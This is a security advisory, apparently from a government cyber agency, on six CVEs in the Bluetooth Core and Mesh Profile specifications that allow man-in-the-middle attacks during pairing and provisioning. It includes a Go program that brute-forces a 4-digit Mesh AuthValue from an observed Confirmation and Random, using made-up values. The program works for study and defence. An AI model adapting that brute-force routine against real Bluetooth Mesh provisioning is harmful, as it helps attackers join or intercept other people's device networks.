
Security Vulnerabilities in Bluetooth Core and Mesh Profile Specifications

Vulnerabilities in Bluetooth Core and Mesh Profile specifications could be exploited to allow Man-in-the-Middle attacks.  Either through impersonation attacks or AuthValue disclosure attacks, an attacker could impersonate a legitimate device during pairing.




Affected platforms

The following platforms are known to be affected:

Threat details

Introduction

The Bluetooth Core Specification defines how Bluetooth devices (both BR/EDR and Low Energy) discover, pair with and communicate with each other; the Bluetooth Mesh Profile Specification builds on Bluetooth Low Energy to define interoperable many-to-many mesh networking, including how new devices are provisioned into a mesh network. Several vulnerabilities have been found in both specifications which could be exploited by an attacker positioned within radio range during pairing or provisioning to launch Man-in-the-Middle (MitM) attacks.


Vulnerability and impact details

  • CVE-2020-26555 - Impersonation in the BR/EDR PIN-pairing protocol
    • Impact: An attacker could complete Legacy Pairing with a known link key, encrypt communications with the other device, and access any profiles permitted to a paired device supporting Legacy Pairing.
  • CVE-2020-26556 - Malleable commitment in Bluetooth Mesh Profile provisioning
    • Impact: An attacker could obtain a NetKey, allowing it to decrypt and authenticate traffic up to the network layer and relay messages (application-layer data, protected by AppKeys, is not exposed by the NetKey alone).
  • CVE-2020-26557 - Predictable AuthValue in Bluetooth Mesh Profile provisioning leads to MitM
    • Impact: An attacker could brute force the AuthValue and authenticate to both targeted devices, permitting a MitM attack.
  • CVE-2020-26558 - Impersonation in the Passkey Entry protocol
    • Impact: An attacker could authenticate to the responder and act as a legitimate encrypted device.
  • CVE-2020-26559 - Bluetooth Mesh Profile AuthValue leak
    • Impact: An attacker could compute the AuthValue and authenticate to the targeted devices.
  • CVE-2020-26560 - Impersonation attack in Bluetooth Mesh Profile provisioning
    • Impact: An attacker could successfully authenticate without knowing the AuthValue and perform any operation permitted to a node on that subnet.
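The two AuthValue weaknesses above (CVE-2020-26557, brute force, and CVE-2020-26559, computing the AuthValue from observed values) share one root cause: in Mesh provisioning the Confirmation value is AES-CMAC(ConfirmationKey, Random || AuthValue), and when the AuthValue is a short numeric out-of-band code the candidate space is tiny. The following Go program is an added illustration, not code from the advisory or from the Bluetooth SIG: it implements AES-CMAC (RFC 4493), computes a provisioning Confirmation over constructed inputs, and shows that an attacker holding one Confirmation and its matching Random recovers a 4-digit AuthValue in at most 10,000 CMAC evaluations. The ConfirmationKey and Random are constructed test values (a real ConfirmationKey is derived from the ECDH shared secret and the provisioning PDUs), and the numeric AuthValue encoding (big-endian integer in the low-order octets of a zero-padded 16-octet value) is assumed here from the Mesh Profile specification's numeric OOB encoding.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// shiftLeftXorRb doubles a 128-bit value in GF(2^128) as RFC 4493 subkey
// generation requires: shift left by one bit, xor 0x87 if the top bit was set.
func shiftLeftXorRb(in []byte) []byte {
	out := make([]byte, len(in))
	var carry byte
	for i := len(in) - 1; i >= 0; i-- {
		out[i] = in[i]<<1 | carry
		carry = in[i] >> 7
	}
	if carry == 1 {
		out[len(out)-1] ^= 0x87
	}
	return out
}

// pad applies the 10* padding of RFC 4493 to a partial final block.
func pad(b []byte) []byte {
	out := make([]byte, 16)
	copy(out, b)
	out[len(b)] = 0x80
	return out
}

func xorBytes(a, b []byte) []byte {
	out := make([]byte, len(a))
	for i := range a {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// aesCMAC implements AES-128-CMAC (RFC 4493), the MAC used for the Mesh
// provisioning Confirmation values.
func aesCMAC(key, msg []byte) []byte {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	const bs = 16
	l := make([]byte, bs)
	block.Encrypt(l, make([]byte, bs)) // L = AES_K(0^128)
	k1 := shiftLeftXorRb(l)
	k2 := shiftLeftXorRb(k1)

	n := (len(msg) + bs - 1) / bs
	var last []byte
	switch {
	case n == 0:
		n = 1
		last = xorBytes(pad(nil), k2)
	case len(msg)%bs == 0:
		last = xorBytes(msg[(n-1)*bs:], k1)
	default:
		last = xorBytes(pad(msg[(n-1)*bs:]), k2)
	}
	x := make([]byte, bs)
	for i := 0; i < n-1; i++ {
		block.Encrypt(x, xorBytes(x, msg[i*bs:(i+1)*bs]))
	}
	out := make([]byte, bs)
	block.Encrypt(out, xorBytes(x, last))
	return out
}

// confirmation computes Confirmation = AES-CMAC(ConfirmationKey, Random || AuthValue).
func confirmation(confirmationKey, random, authValue []byte) []byte {
	msg := append(append([]byte{}, random...), authValue...)
	return aesCMAC(confirmationKey, msg)
}

// numericAuthValue encodes a numeric OOB code as a 16-octet AuthValue
// (assumed encoding: big-endian integer, zero-padded on the left).
func numericAuthValue(n uint64) []byte {
	av := make([]byte, 16)
	binary.BigEndian.PutUint64(av[8:], n)
	return av
}

// bruteForceNumericAuthValue tries every `digits`-digit code against an observed
// Confirmation and its Random; this is the whole attacker work factor.
func bruteForceNumericAuthValue(confirmationKey, random, observed []byte, digits int) (uint64, bool) {
	limit := uint64(1)
	for i := 0; i < digits; i++ {
		limit *= 10
	}
	for n := uint64(0); n < limit; n++ {
		if bytes.Equal(confirmation(confirmationKey, random, numericAuthValue(n)), observed) {
			return n, true
		}
	}
	return 0, false
}

func main() {
	// Constructed values for illustration only.
	key, _ := hex.DecodeString("00112233445566778899aabbccddeeff")
	random, _ := hex.DecodeString("8b19ac31d58b124c946209b5db1021b9")
	observed := confirmation(key, random, numericAuthValue(3519))
	n, ok := bruteForceNumericAuthValue(key, random, observed, 4)
	fmt.Printf("recovered=%v authValue=%04d (at most 10^4 CMACs)\n", ok, n)
}
```

The point for defenders is that the MAC itself is sound; the exposure comes from a low-entropy AuthValue combined with protocol ordering that lets the attacker obtain a Confirmation and the corresponding Random before it has to commit to its own. The patched specifications and vendor updates address that ordering and the use of static or predictable AuthValues, which is why installing the updates is the remediation rather than changing the MAC.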

Remediation advice

Administrators and users are encouraged to install the latest recommended updates from Bluetooth device and operating system manufacturers as they become available.

For more information, please refer to the statement from the CERT Coordination Center.


Last edited: 2 June 2021 2:38 pm